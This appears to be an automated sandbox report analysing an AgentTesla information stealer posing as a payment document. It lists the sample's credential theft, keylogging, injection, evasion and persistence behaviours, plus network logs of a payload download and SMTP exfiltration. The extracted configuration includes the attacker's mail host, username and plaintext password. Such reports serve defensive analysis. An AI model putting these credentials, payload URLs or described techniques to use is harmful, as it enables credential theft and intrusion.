Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment-Details.scr.exe

Overview

General Information

Sample name:Payment-Details.scr.exe
Analysis ID:1495997
MD5:eee76d74368111c385e634a9f4f5a9cf
SHA1:35a9afb88f649e243a1be654ef7aad6e5dafbce5
SHA256:82ee5c8372f9bc8ac9cfac2833c19d238fa8a60fa32e6d27d9fc781d2e64dc25
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Payment-Details.scr.exe (PID: 432 cmdline: "C:\Users\user\Desktop\Payment-Details.scr.exe" MD5: EEE76D74368111C385E634A9F4F5A9CF)
    • InstallUtil.exe (PID: 2332 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Fdimzk.exe (PID: 6012 cmdline: "C:\Users\user\AppData\Roaming\Fdimzk.exe" MD5: EEE76D74368111C385E634A9F4F5A9CF)
    • InstallUtil.exe (PID: 2740 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Fdimzk.exe (PID: 3228 cmdline: "C:\Users\user\AppData\Roaming\Fdimzk.exe" MD5: EEE76D74368111C385E634A9F4F5A9CF)
    • InstallUtil.exe (PID: 2852 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "nffplp.com", "Username": "airlet@nffplp.com", "Password": "$Nke%8XIIDtm"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2016324901.00000000023AE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.2100971081.0000000003269000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2100971081.0000000003269000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000003.00000002.2016324901.0000000002381000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000002.2016324901.0000000002381000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 43 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.Payment-Details.scr.exe.7160000.11.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.Payment-Details.scr.exe.47efcb0.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                5.2.Fdimzk.exe.41206f0.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  5.2.Fdimzk.exe.41206f0.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    5.2.Fdimzk.exe.41206f0.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x322ef:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x32361:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x323eb:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x3247d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x324e7:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x32559:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x325ef:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x3267f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    Click to see the 24 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Fdimzk.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Payment-Details.scr.exe, ProcessId: 432, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Fdimzk
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 163.44.198.71, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 2332, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 62397

                    Suricata Signatures

                    No Suricata rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 3.2.InstallUtil.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "nffplp.com", "Username": "airlet@nffplp.com", "Password": "$Nke%8XIIDtm"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeReversingLabs: Detection: 18%
                    Multi AV Scanner detection for submitted file
                    Source: Payment-Details.scr.exeReversingLabs: Detection: 18%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: Payment-Details.scr.exeJoe Sandbox ML: detected
                    Source: Payment-Details.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 5.144.130.41:443 -> 192.168.2.8:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 5.144.130.41:443 -> 192.168.2.8:62398 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 5.144.130.41:443 -> 192.168.2.8:62401 version: TLS 1.2
                    Source: Payment-Details.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.0000000004409000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000036C9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1690104428.0000000006690000.00000004.08000000.00040000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.0000000002A0A000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2041551021.0000000003797000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000003179000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.000000000403D000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.0000000004409000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000036C9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1690104428.0000000006690000.00000004.08000000.00040000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.0000000002A0A000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2041551021.0000000003797000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000003179000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.000000000403D000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 4x nop then jmp 063669F7h0_2_06366738
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 4x nop then jmp 063669F7h0_2_06366728
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 4x nop then jmp 063669F7h0_2_06366822
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 4x nop then jmp 0723A582h0_2_0723A4E8
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 4x nop then jmp 0723A582h0_2_0723A4F8
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4x nop then jmp 058469F7h4_2_05846738
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4x nop then jmp 058469F7h4_2_05846728
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4x nop then jmp 058469F7h4_2_05846822
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4x nop then jmp 0688A582h4_2_0688A4E8
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4x nop then jmp 0688A582h4_2_0688A4F8

                    Networking

                    barindex
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Fdimzk.exe.382ec18.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Fdimzk.exe.41206f0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.8:62397 -> 163.44.198.71:587
                    Source: global trafficHTTP traffic detected: GET /chmod%20permission%20777/panel/Uslmwziyya.vdf HTTP/1.1Host: etehadshipping.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /chmod%20permission%20777/panel/Uslmwziyya.vdf HTTP/1.1Host: etehadshipping.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 163.44.198.71 163.44.198.71
                    Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                    Source: Joe Sandbox ViewASN Name: GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: ip-api.com
                    Source: global trafficTCP traffic: 192.168.2.8:62397 -> 163.44.198.71:587
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /chmod%20permission%20777/panel/Uslmwziyya.vdf HTTP/1.1Host: etehadshipping.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /chmod%20permission%20777/panel/Uslmwziyya.vdf HTTP/1.1Host: etehadshipping.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: etehadshipping.com
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: nffplp.com
                    Source: InstallUtil.exe, 00000003.00000002.2023490581.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2016324901.00000000023B4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2101369596.0000000002DE4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2116445319.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2100799382.00000000012AF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2700908180.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2713649134.0000000006000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: InstallUtil.exe, 00000003.00000002.2023490581.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2012119620.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2116445319.00000000060E0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2713649134.0000000006000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: InstallUtil.exe, 00000008.00000002.2116445319.00000000060D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertifi
                    Source: InstallUtil.exe, 00000003.00000002.2023490581.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2016324901.00000000023B4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2101369596.0000000002DE4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2116445319.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2100799382.00000000012AF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2700908180.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2699054020.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2713649134.0000000006000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: InstallUtil.exe, 00000003.00000002.2012932456.000000000060A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2023490581.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2016324901.00000000023B4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2101369596.0000000002DE4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2116445319.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2100799382.00000000012AF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2700908180.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2713649134.0000000006000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
                    Source: InstallUtil.exe, 00000003.00000002.2016324901.0000000002351000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2101369596.0000000002D8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2700908180.0000000002C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2012136822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2016324901.0000000002351000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2041551021.0000000003819000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.0000000002B02000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000003269000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.000000000410B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2101369596.0000000002D8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2100799382.00000000012AF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2700908180.0000000002C9C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2699054020.0000000000FCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: InstallUtil.exe, 00000008.00000002.2099749827.00000000011FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting%
                    Source: InstallUtil.exe, 00000009.00000002.2697884793.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting-
                    Source: InstallUtil.exe, 00000003.00000002.2012932456.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingD9;k
                    Source: InstallUtil.exe, 00000003.00000002.2012932456.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingc9
                    Source: InstallUtil.exe, 00000003.00000002.2016324901.00000000023B4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2101369596.0000000002DE4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2700908180.0000000002CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nffplp.com
                    Source: InstallUtil.exe, 00000003.00000002.2012932456.000000000060A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2023490581.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2016324901.00000000023B4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2101369596.0000000002DE4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2116445319.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2100799382.00000000012AF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2700908180.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2699054020.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2713649134.0000000006000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: Fdimzk.exe, 00000005.00000002.2100971081.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2097879038.000000000128E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/03
                    Source: Fdimzk.exe, 00000005.00000002.2100971081.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2097879038.000000000128E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                    Source: Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2016324901.0000000002351000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2101369596.0000000002D8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2700908180.0000000002C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Fdimzk.exe, 00000005.00000002.2097879038.000000000128E000.00000004.00000020.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2097879038.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: Fdimzk.exe, 00000005.00000002.2097879038.000000000128E000.00000004.00000020.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2097879038.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2012136822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2041551021.0000000003819000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.0000000002B02000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000003269000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.000000000410B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000002EBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://etehadshipping.com
                    Source: Payment-Details.scr.exe, Fdimzk.exe.0.drString found in binary or memory: https://etehadshipping.com/chmod
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2041551021.0000000003C53000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.0000000004413000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: InstallUtil.exe, 00000003.00000002.2012932456.000000000060A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2023490581.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2016324901.00000000023B4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2101369596.0000000002DE4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2116445319.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2100799382.00000000012AF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2700908180.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2713649134.0000000006000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
